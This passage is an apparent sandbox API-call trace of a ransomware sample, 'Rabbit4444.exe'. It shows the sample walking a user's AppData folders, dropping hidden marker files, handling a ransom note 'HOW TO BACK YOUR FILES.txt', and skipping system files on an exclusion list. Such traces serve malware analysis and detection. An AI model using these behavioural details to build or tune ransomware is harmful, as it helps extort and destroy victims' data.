ftCreationTime.dwLowDateTime=0xedd3c810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd3c810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd62a39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.264] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0061.264] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.265] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.265] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.265] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.265] CloseHandle (hObject=0x2a0) returned 1 [0061.265] CloseHandle (hObject=0x27c) returned 1 [0061.265] GetCurrentThreadId () returned 0xd98 [0061.265] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0061.265] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData" [0061.265] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118b28 | out: hHeap=0xe0000) returned 1 [0061.265] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0061.265] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData" [0061.265] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\" [0061.265] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0061.265] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.267] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.270] FlushFileBuffers (hFile=0x27c) returned 1 [0061.271] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.271] CloseHandle (hObject=0x27c) returned 1 [0061.271] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData") returned 80 [0061.271] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.272] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf685c2d2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263aaf4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd62a39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0061.272] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.272] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.272] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.272] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.272] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf685c2d2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263aaf4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd62a39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.272] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.272] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.272] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.272] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.272] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.272] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd62a39, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd62a39, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.272] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.272] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.272] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd62a39, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd62a39, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.272] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0061.272] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.273] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.273] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.273] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.273] CloseHandle (hObject=0x2a0) returned 1 [0061.273] CloseHandle (hObject=0x27c) returned 1 [0061.273] GetCurrentThreadId () returned 0xd98 [0061.273] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0061.273] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC" [0061.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113558 | out: hHeap=0xe0000) returned 1 [0061.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0061.273] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC" [0061.273] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\" [0061.273] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0061.273] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.276] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.279] FlushFileBuffers (hFile=0x27c) returned 1 [0061.280] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.280] CloseHandle (hObject=0x27c) returned 1 [0061.281] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC") returned 75 [0061.281] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.281] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf68824d4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a34c4f0, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0061.281] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.281] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.281] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.281] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.281] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf68824d4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a34c4f0, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.281] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.281] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.281] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.281] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.281] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.281] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd88d24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd88d24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.281] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.281] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.281] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26377f6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf68a8755, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0061.281] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0061.282] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0061.282] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0061.282] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0061.282] lstrcpyW (in: lpString1=0x130ebd0, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0061.282] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0061.282] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" [0061.282] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\" [0061.282] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0061.282] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.283] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.286] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.286] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.286] CloseHandle (hObject=0x2a0) returned 1 [0061.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0061.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x1246a0 [0061.287] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x122148 | out: ListHead=0xf6750, ListEntry=0x122148) returned 0x0 [0061.287] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26389a5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf68a8755, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0061.287] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0061.287] lstrcpyW (in: lpString1=0x130ebd0, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0061.287] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0061.288] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0061.288] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x1240e0 [0061.288] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122008 [0061.288] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26392d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf68a8755, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0061.288] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0061.288] lstrcpyW (in: lpString1=0x130ebd0, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0061.288] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0061.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0061.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123e00 [0061.289] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220a8 [0061.289] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2639eab, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf68a8755, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0061.289] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0061.289] lstrcpyW (in: lpString1=0x130ebd0, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0061.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0061.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x118f48 [0061.289] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122128 [0061.289] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2639eab, 